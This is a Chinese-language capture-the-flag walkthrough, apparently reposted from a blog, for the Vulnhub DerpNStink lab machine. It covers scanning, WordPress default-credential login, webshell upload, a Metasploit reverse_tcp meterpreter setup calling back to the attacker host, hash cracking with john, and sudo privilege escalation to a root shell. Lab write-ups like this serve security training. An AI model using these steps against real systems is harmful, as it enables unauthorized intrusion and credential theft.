返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >Vulnhub:Derpnstink靶机渗透
  • 101
分享到

Vulnhub:Derpnstink靶机渗透

php服务器 2023-09-07 12:09:28 101人浏览 泡泡鱼
摘要

攻击机kali:192.168.56.108 靶机derpnstink:192.168.56.114   扫描同网段下存活主机 扫描服务版本信息   开启了21、22、80端口,分别对应着ftp、ssh、Http服务,打开浏览器进行访问

攻击机kali:192.168.56.108

靶机derpnstink:192.168.56.114

 

扫描同网段下存活主机

fc9d3b282e794334ab2fd7d1aa8535de.png

扫描服务版本信息

9d75e0ff8d714801afeac4ca216feecb.png

 

开启了21、22、80端口,分别对应着ftp、sshHttp服务,打开浏览器进行访问

db94c83955dc4c6085dfdb6f7880ede8.png

 

查看源代码发现flag1和info.txt

9a3583d398ef42a89f89a29ea4297acd.png

 点开info.txt

d2588d87a0ea475e84a5c523b6beb0e6.png

这个的意思就是要让我们在本地添加一个dns解析,先不管 因为还不知道具体要添加的东西

接着使用工具扫描网站目录,发现了robots.txt文件,WEBlog目录下存在登录页面,PHP目录下有phpmyadmin,都访问看看有什么有用的信息,太多了这里就不一一列出了

cf099bf3d4d84c9fb112ba23db17f818.png

进行访问的时候会发现weblog目录下的都打不开

12974d2f410f484fb904c4adb0e4c57e.png

刚好前面也拿到提示说要在本地添加一个dns记录,

linux系统在/etc/hosts文件中进行添加

525202606abf4ef29c3e0aa5da51eb60.png

添加了之后就可以正常访问了,访问刚刚扫目录得到的登录页面,

3b3637aba9b2473387829eb1106c6985.png

很明显是一个Wordpress的网站

使用awvs扫描网站发现存在弱口令admin/admin

a60a9fda753749b6b6624801cf84cfab.png

 登录到刚刚的网站

3254efea72d047faa8d3f1295ed6e82e.png

 

登录成功后在slideshow的manage slides的add new发现可以上传文件,二话不说直接传个马然后蚁剑连接

cc07c6c1e1b043db87fdf440add63677.png

查找配置文件并查看,拿到数据库的用户名和密码

27c8bad5f803427e91e92f6ebcc746b1.png

获取数据库用户名和密码的第二种方法:

使用wpscan对wordpress网站进行扫描

d54e94bd3a294bbe8402ae3ee54dc3a2.png

发现这个插件存在漏洞,进入msf查看有没有可以利用的模块

b08bb28290874c29ab7f504c8186baae.png

发现存在可以利用的模块,直接一把梭拿shell

use 1set payload php/meterpreter/reverse_tcpset rhosts 192.168.56.114set lhost 192.168.56.108set targeturi /weblogset wp_user adminset wp_password admin

 

78e3a35389aa4f58a6b956a7d44ab7da.png

shell,进入一个交互式的shell,然后查看配置文件cat /var/www/html/weblog/wp-config.php

d171a2308263474b8053bea6c7e8e20b.png

发现了数据库的账号密码,而前面找到的phpmyadmin页面就是一个Mysql数据库管理页面,进行登录,登录成功后经过一番寻找发现了flag2

165ad58b55f54f5f9ca49245f34793c3.png

同时还发现了另外一个账号密码

e7f222aaeeda42159542c05af47260c5.png

将密码的哈希值保存到一个文件里,然后用john进行解密

47a170fad8f24a8ca9f76bd6ce05ded4.png

 639db01fc76c46b4ae6e7503b174fb5b.png

得到密码为wedgie57,同时在班级home目录下发现了两个用户:mrderp,stinky

尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57

dd40ceef6add4d4bb81080ae761135cc.png

成功切换到stinky用户,进入到stinky目录并查看当前目录的所有文件

03775676e1eb42a2b9e083664ac12e07.png

在Desktop目录发现了flag3

04b360376f7744388a4d307fa50f36c1.png

在Documents目录发现了一个derpissues.pcap数据包文件,但是发现无法将其下载到本地,可以先将其复制到tmp目录下,然后在蚁剑拿到的shell中将其进行下载,下载之后用wireshark打开进行分析,过滤,发现了mrderp的登录密码

4a16384b6366468b8bb45d58adacf6fb.png

在shell里切换登录到mrderp,发现不可行

d2f97a33c0e242559a12b028b1ccdeb4.png

接着尝试使用ssh进行远程连接

d66f68a3fe6f4aa4ba06c791a8ec0983.png

连接成功,并在Desktop目录下发现了一个日志文件

6a1e4befe6154700bb44defacc218c59.png

打开后发现是个聊天记录,要我们访问https://pastebin.com/RzK9WfGw

4a85c8fa1c824be1829fa77000eb72e5.png

9dd56ee66f984a48af6d63a545c90e95.png

根据该信息的提示,使用二进制提权。先创建一个binaries文件夹,进入到binaries文件夹将/bin/bash写入到derpy.sh文件中并赋予其权限,然后使用sudo命令运行该文件就成功提权为root权限了

mkdir binariescd binariesecho “/bin/bash” >> derpy.shchmod +x derpy.shsudo ./derpy.sh

 

a9322fd9b9834825ab6b74b255616919.png

最后在root目录下的Desktop目录找到最后一个flag

 

来源地址:https://blog.csdn.net/m0_62008601/article/details/128443253

--结束END--

本文标题: Vulnhub:Derpnstink靶机渗透

本文链接: https://lsjlt.com/news/398253.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作